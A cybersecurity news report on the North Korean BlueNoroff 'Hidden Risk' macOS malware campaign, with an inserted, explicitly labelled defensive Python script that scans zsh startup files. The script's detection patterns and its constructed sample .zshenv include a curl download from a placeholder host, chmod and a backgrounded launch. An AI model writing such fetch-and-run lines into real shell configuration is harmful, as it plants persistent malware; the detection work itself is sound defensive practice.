A threat actor associated with the Democratic People’s Republic of Korea (DPRK) has been detected targeting businesses related to cryptocurrency with a multi-stage malware designed to infect Apple macOS devices.

Cybersecurity firm SentinelOne, which labeled the initiative Hidden Risk, strongly associates it with BlueNoroff, a group already linked to various malware families including RustBucket, KANDYKORN, ObjCShellz, RustDoor (also known as Thiefbucket), and TodoSwift.

This activity involves using emails that promote fake news about cryptocurrency trends to infect targets via a malicious application disguised as a PDF file, noted researchers Raffaele Sabato, Phil Stokes, and Tom Hegel in a report shared with The Hacker News.

According to the report, the campaign likely started as early as July 2024, employing email and PDF lures featuring fictitious news headlines or stories on crypto-related subjects.

As reported by the U.S. Federal Bureau of Investigation (FBI) in a September 2024 advisory, these campaigns represent “highly tailored, difficult-to-detect social engineering” attacks targeting employees within the decentralized finance (DeFi) and cryptocurrency sectors.

The attacks appear as fake job offers or corporate investment opportunities, where the threat actors engage with their targets for extended periods to build trust before deploying malware.

SentinelOne reported observing a phishing attempt on a cryptocurrency-related entity in late October 2024. This incident involved the delivery of a dropper application posing as a PDF file titled “Hidden Risk Behind New Surge of Bitcoin Price.app,” hosted on delphidigital[.]org.

Crafted using the Swift programming language, this application was signed and notarized on October 19, 2024, under the Apple developer ID “Avantis Regtech Private Limited (2S8XHJ7948),” but the signature has since been revoked by Apple.

When launched, the application presents the victim with a fake PDF file fetched from Google Drive, while covertly retrieving and executing a second-stage executable from a remote server. This executable acts as a backdoor, enabling remote command execution.

Furthermore, the backdoor employs a novel persistence method that abuses the zshenv configuration file, the first time this technique has been observed in active malware.

The technique is particularly effective on current macOS versions: since macOS 13 Ventura, the system notifies the user when a background Login Item is added, so persistence through LaunchAgents or LaunchDaemons triggers an alert, whereas a modification to zshenv does not.
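Because a zshenv edit raises no Login Item notification, the practical defensive control is to audit zsh startup files directly. The script below is an added example, not code from the article or from SentinelOne; its patterns are assumed heuristics for what a persistence-style addition to ~/.zshenv tends to contain (a remote download, a hidden directory, a backgrounded launch, quarantine stripping) rather than a signature for the Hidden Risk sample, and the sample file and its domain are constructed.

```python
"""Audit zsh startup files for persistence-style additions.

Added example, not from the original article or from SentinelOne. The
heuristics below are assumptions about what a hostile addition to
~/.zshenv tends to look like, not a signature for any specific sample.
"""
from __future__ import annotations

import os
import re
from dataclasses import dataclass
from pathlib import Path

# Files zsh sources on startup. .zshenv is read for every zsh invocation,
# interactive or not, which is what makes it attractive for persistence.
ZSH_STARTUP_FILES = [".zshenv", ".zprofile", ".zshrc", ".zlogin"]

# Heuristic patterns (assumed indicators; expect some benign hits, e.g. on
# ~/.config paths, which is why matches are flagged for review, not blocked).
SUSPICIOUS_PATTERNS = {
    "remote_download": re.compile(r"\b(curl|wget)\b.*https?://", re.I),
    "hidden_path_exec": re.compile(r"(^|[\s;&|])\S*/\.[A-Za-z0-9_-]+/\S+"),
    "background_launch": re.compile(r"\bnohup\b|&\s*$|2>/dev/null\s*&"),
    "decode_and_run": re.compile(r"base64\s+(-d|--decode)|\bxxd\s+-r\b|\beval\b"),
    "quarantine_strip": re.compile(r"xattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine"),
    "make_executable": re.compile(r"\bchmod\s+(\+x|[0-7]*[1357][0-7]*)\b"),
}


@dataclass(frozen=True)
class Finding:
    source: str
    line_no: int
    rule: str
    line: str


def scan_startup_text(text: str, source: str = "<text>") -> list[Finding]:
    """Return one Finding per (non-comment) line and matching heuristic."""
    findings: list[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for rule, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(line):
                findings.append(Finding(source, line_no, rule, line))
    return findings


def audit_home(home: str | os.PathLike | None = None) -> list[Finding]:
    """Scan the zsh startup files under a home directory (missing files are skipped)."""
    base = Path(home) if home is not None else Path.home()
    findings: list[Finding] = []
    for name in ZSH_STARTUP_FILES:
        path = base / name
        if path.is_file():
            findings.extend(scan_startup_text(path.read_text(errors="replace"), str(path)))
    return findings


# Constructed sample: a benign .zshenv followed by a persistence-style tail.
# The domain is a placeholder, not a real indicator.
SAMPLE_ZSHENV = """\
# benign user config
export PATH="$HOME/bin:$PATH"
export EDITOR=vim
# constructed hostile tail (placeholder domain, not a real IoC)
curl -s https://example.invalid/payload -o "$HOME/.config/.sys/update"
chmod +x "$HOME/.config/.sys/update"
nohup "$HOME/.config/.sys/update" >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for f in scan_startup_text(SAMPLE_ZSHENV, "sample .zshenv"):
        print(f"{f.source}:{f.line_no} [{f.rule}] {f.line}")
    for f in audit_home():
        print(f"{f.source}:{f.line_no} [{f.rule}] {f.line}")
```

On the constructed sample the scan flags only the three appended lines (six rule hits in total) and nothing in the benign header. In a fleet deployment, the useful signal is a diff against a known-good baseline of each user's startup files, with the scan above as the triage step for lines that changed.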

The threat actor has been observed utilizing domain registrar Namecheap to set up infrastructure themed around cryptocurrency, Web3, and investments, lending a facade of legitimacy to their activities. Hosting services such as Quickpacket, Routerhosting, and Hostwinds are among their preferred choices.

Notably, the attack chain bears similarities to a prior campaign highlighted by Kandji in August 2024, which also utilized a similarly titled macOS dropper app to deploy TodoSwift.

It’s unclear what led to the change in tactics by the threat actors, though it may relate to public reports concerning their activities. “North Korean actors have exhibited resourcefulness and adaptability, making it feasible that we are witnessing the emergence of new successful methods from their offensive cyber strategies,” remarked Stokes to The Hacker News.

Another alarming aspect of this campaign is BlueNoroff’s capability to acquire or hijack legitimate Apple developer accounts, facilitating the notarization of their malware by Apple.

In recent months, North Korean cyber actors have reportedly conducted campaigns against the cryptocurrency industry, involving significant ‘grooming’ efforts of targets through social media channels.

In contrast, the Hidden Risk campaign relies on a more traditional and less subtle email phishing approach, which nonetheless remains effective. The hallmarks of earlier DPRK-backed operations are still visible.

The evolving landscape also includes other operations by North Korean hackers seeking employment opportunities in Western companies, delivering malware through compromised codebases and virtual meeting tools disguised as hiring challenges or assignments.

Two intrusion sets, known as Wagemole (aka UNC5267) and Contagious Interview, have been attributed to a threat group tracked as Famous Chollima (aka CL-STA-0240 and Tenacious Pungsan).

ESET has categorized Contagious Interview as a new active cluster within the Lazarus Group, primarily targeting freelance developers globally to facilitate cryptocurrency theft.

“The Contagious Interview and Wagemole initiatives demonstrate the evolving methods employed by North Korean threat actors in their relentless pursuit of data theft and remote job placements in Western nations, aiming to circumvent financial sanctions,” stated Zscaler ThreatLabz researcher Seongsu Park recently.

“Thanks to advanced obfuscation techniques, cross-platform compatibility, and rampant data theft, these operations increasingly threaten businesses and individuals alike.”
